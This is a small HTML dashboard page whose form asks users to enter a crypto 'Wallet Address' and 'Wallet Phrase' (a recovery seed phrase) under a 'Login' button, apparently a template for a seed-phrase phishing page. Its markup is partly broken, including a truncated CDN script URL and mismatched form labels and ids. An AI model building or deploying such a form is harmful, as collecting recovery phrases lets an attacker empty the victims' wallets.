<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Register</title>

    <link rel="icon" type="image/x-icon" href="assets/favicon.ico" />
    <link href="/dist/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
    <link href="/styles.css" rel="stylesheet" />
</head>
<body class="dasher vh-100 container-fluid">
    <div class="row h-100">
        <aside class="col-md-2 py-4 border">
           
            <ul class="h-50 d-flex flex-column gap-4">
                <li>Analytics</li>
                <li>Charts</li>
                <li><a href="/link">Link Account</a></li>
                <li>Logout</li>
            </ul>
        </aside>
        <div class="col-md-10 d-flex p-4 bg-light  justify-content-center">
            <form action="" class="w-75 shado2 p-4 border" method="post">
                <div class="form-group d-flex flex-column my-3">
                    <label for="email" class="h5">Wallet Address</label>
                    <input type="text" id="email" name="email" class="form-control">
                </div>
                <div class="form-group d-flex flex-column my-3">
                    <label for="email" class="h5">Wallet Phrase</label>
                    <textarea name="" id=""></textarea>
                </div>
                <button class="w-100 border-0 p-2">Login</button>
            </form>
        </div>
    </div>  

    <script src="https://cdn.jsdel/dist/js/bootstrap.bundle.min.js"></script>
    <script src="/dist/js/bootstrap.min.js"></script>
</body>
</html>